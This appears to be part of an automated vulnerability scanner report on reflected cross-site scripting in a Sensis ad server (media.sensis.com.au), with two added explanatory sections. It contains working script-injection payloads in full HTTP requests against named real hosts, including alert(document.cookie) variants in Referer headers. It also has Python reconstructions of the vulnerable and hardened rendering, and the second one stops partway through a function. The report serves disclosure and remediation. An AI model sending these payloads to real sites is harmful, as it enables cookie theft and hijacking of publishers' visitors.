This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random419f5"><script>alert(1)</script>1d85051ff8d=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:34 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_random419f5"><script>alert(1)</script>1d85051ff8d=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146
...[SNIP]...

2.610. http://media.sensis.com.au/hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb5c"><script>alert(1)</script>57436f0d50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?2bb5c"><script>alert(1)</script>57436f0d50=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:32 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 505
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?2bb5c"><script>alert(1)</script>57436f0d50=1" target="_new">
...[SNIP]...
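Findings 2.609 through 2.613 are one defect seen through three inputs: whatever follows /hserver in the request target (the first path segment, the acc_random key, or the name of a query parameter) is copied verbatim into the href of the ADCLICK anchor, so a `"` closes the attribute value and `>` closes the tag. The Referer headers show the probe originated from a page on virtualmedicalcentre.com that embeds this ad call, which is how a flaw in the ad server becomes an XSS on the publisher's page. The block below is an added example, not code from this report, from Hoyt LLC, or from the Sensis ad server: it reconstructs the rendering from the 2.610 response (the CID prefix and path constants are copied from it, the probe target is constructed), puts a context-correct encoding next to it, applies the same canary verdict the report uses (random prefix, breakout, random suffix), and adds a structural check that a `<script>` really lands outside any attribute. The server-side concatenation is an assumption inferred from the response.

```python
"""
Added example, not part of the scanner report or of any Sensis code: a
stand-alone reconstruction of the flaw in findings 2.609-2.613 and a check in
the style of the scanner's canary probe. Server behaviour is inferred from
the responses shown; constants are copied from finding 2.610 and the probe
target is constructed.
"""
import html
import re
from urllib.parse import quote

# Breakout used by every finding in this section: close the attribute value,
# close the tag, start a script element.
BREAKOUT = '"><script>alert(1)</script>'

# Copied from the 2.610 response (the CID value is the one the server emitted).
CLICK_BASE = "http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000"
# Constructed: a shortened form of the 2.610 request path.
AD_TARGET = "/hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/pageid=146995204521"


def probe_target(prefix, suffix):
    """Request target for the 'arbitrary parameter name' case: the breakout is
    the *name* of a query parameter, so it is reflected wherever the server
    echoes the request target verbatim."""
    return f"{AD_TARGET}?{prefix}{BREAKOUT}{suffix}=1"


def vulnerable_anchor(request_target):
    """Assumed server behaviour, inferred from the response: the raw request
    target is appended to the click-tracking URL and dropped into a
    double-quoted href without any encoding."""
    return f'<a href="{CLICK_BASE}{request_target}" target="_new">'


def hardened_anchor(request_target):
    """Encode for each context the value passes through. quote() turns '"',
    '<', '>' and '(' into %XX so they cannot survive as raw bytes in the URL;
    html.escape(quote=True) then protects the attribute from any '"' or '&'
    that a legitimate URL may still carry."""
    url = CLICK_BASE + quote(request_target, safe="/?=&")
    return f'<a href="{html.escape(url, quote=True)}" target="_new">'


def classify_reflection(body, prefix, suffix):
    """The scanner's verdict on a response body.

    'unmodified'  prefix+BREAKOUT+suffix is present byte for byte (the report's
                  "echoed unmodified" case, hence Confidence: Certain)
    'encoded'     prefix and suffix are both present but the breakout between
                  them was altered, so the input came back in a safe form
    'absent'      the canary did not come back at all
    """
    if prefix + BREAKOUT + suffix in body:
        return "unmodified"
    if re.search(re.escape(prefix) + r".*?" + re.escape(suffix), body):
        return "encoded"
    return "absent"


def script_outside_attributes(body):
    """Structural confirmation that the breakout worked: split the markup on
    double quotes; even-indexed chunks lie outside attribute values, so a
    '<script>' there is one the browser will execute."""
    outside = "".join(body.split('"')[0::2])
    return "<script>" in outside


if __name__ == "__main__":
    target = probe_target("2bb5c", "57436f0d50")
    for label, render in (("vulnerable", vulnerable_anchor),
                          ("hardened", hardened_anchor)):
        body = render(target)
        verdict = classify_reflection(body, "2bb5c", "57436f0d50")
        executes = script_outside_attributes(body)
        print(f"{label}: {verdict}, {'script executes' if executes else 'inert'}")
        print("  ", body)
```

Running it prints both anchors with their verdicts. The hardened form still carries the whole click-through path, only percent-encoded, which the ADCLICK handler must decode on the way out; that is why encoding for the output context, rather than stripping characters, is the right fix for a click redirector.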

2.611. http://media.sensis.com.au/hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db963"><script>alert(1)</script>4c8856cbb4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverdb963"><script>alert(1)</script>4c8856cbb4e/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:38 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000db963"><script>alert(1)</script>4c8856cbb4e/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.612. http://media.sensis.com.au/hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67607"><script>alert(1)</script>a4421dd3bec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random67607"><script>alert(1)</script>a4421dd3bec=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:40 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_random67607"><script>alert(1)</script>a4421dd3bec=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.613. http://media.sensis.com.au/hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a11b5"><script>alert(1)</script>d321bb28ecc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a11b5"><script>alert(1)</script>d321bb28ecc=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:37 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 520
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_random=469307811793/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?a11b5"><script>alert(1)</script>d321bb28ecc=1" target="_new">
...[SNIP]...

2.614. http://media.sensis.com.au/hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ddb"><script>alert(1)</script>fcbe3980e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverb9ddb"><script>alert(1)</script>fcbe3980e99/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:52 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 2521
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000b9d
...[SNIP]...
<A href="http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000b9ddb"><script>alert(1)</script>fcbe3980e99/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955/relocate=https://ad.au.doublecl
...[SNIP]...

2.615. http://media.sensis.com.au/hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6892"><script>alert(1)</script>b3b34b94df1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randome6892"><script>alert(1)</script>b3b34b94df1=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:53 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_randome6892"><script>alert(1)</script>b3b34b94df1=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955/relocate=http://clk.redcated/OMA/go/27018
...[SNIP]...

2.616. http://media.sensis.com.au/hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7c1"><script>alert(1)</script>85b8afcd626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955?4c7c1"><script>alert(1)</script>85b8afcd626=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:50 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 2542
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/ac
...[SNIP]...
CK/CID=00031a5f0000000000000000/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=995784169955?4c7c1"><script>alert(1)</script>85b8afcd626=1&relocate=https://ad.au.vulnerable.ad.partner/jump/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_random=497799777040/SITE=TEL.BIGPOND.PORTAL.ENTERTAINME
...[SNIP]...
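In 2.614 and 2.616 the reflected value does not stop at the ADCLICK anchor. The response wraps it into the click= macro of a third-party tag URL (ad.au.vulnerable.ad.partner/adj/...), that URL into a src attribute, the attribute into a JS string literal passed to document.write, and that string into a <script> block. Each layer has its own delimiter, and the `'<scr'+'ipt'` split in the response protects only the author's own tag from the HTML tokeniser, not attacker-supplied text that contains `</script>`. This is the cascade: a single unencoded copy propagates the payload into the downstream ad partner's request as well. The block below is an added example, not code from this report or from either ad server: it rebuilds the vulnerable concatenation from the 2.616 response (the tag URL and CID prefix are copied from it, the request target is constructed), shows the encoding each layer needs, and decodes the hardened output the way the browser and then the partner server would, to confirm the click URL survives intact while the breakout never appears as markup. The server logic is an assumption inferred from the response.

```python
"""
Added example, not part of the scanner report or of any Sensis or ad-partner
code: a reconstruction of the nested contexts in findings 2.614 and 2.616.
Constants are copied from the 2.616 response; the server behaviour is
inferred from it and the request target below is constructed.
"""
import html
import json
import re
from urllib.parse import quote, unquote

PARTNER_TAG = "https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2"
CLICK_BASE = "http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000"


def vulnerable_tag(request_target):
    """Assumed from the 2.616 response: the raw target is glued into click=,
    the URL into a src attribute and that into a JS string, with no encoding
    at any layer. The 'scr'+'ipt' split hides only the author's own tag from
    the HTML tokeniser; attacker text passes through untouched."""
    src = f"{PARTNER_TAG};click={CLICK_BASE}{request_target}"
    return "document.write('<scr'+'ipt src=\"" + src + "\"></scr'+'ipt>');"


def click_url(request_target):
    """Layer 1: the click-through URL itself. Percent-encode everything except
    the characters that give the path and query their structure."""
    return CLICK_BASE + quote(request_target, safe="/?=&")


def js_string(s):
    """Layer 3: a JS string literal. json.dumps escapes quotes, backslashes and
    control characters; '</' is additionally broken up because the HTML
    tokeniser ends a <script> block at '</script' before the JS engine runs."""
    return json.dumps(s).replace("</", "<\\/")


def hardened_tag(request_target):
    # Layer 2: the click URL is a *value* inside the partner URL, so every
    # reserved character in it is encoded (safe="" encodes '/', ':', '?', '%').
    src = f"{PARTNER_TAG};click={quote(click_url(request_target), safe='')}"
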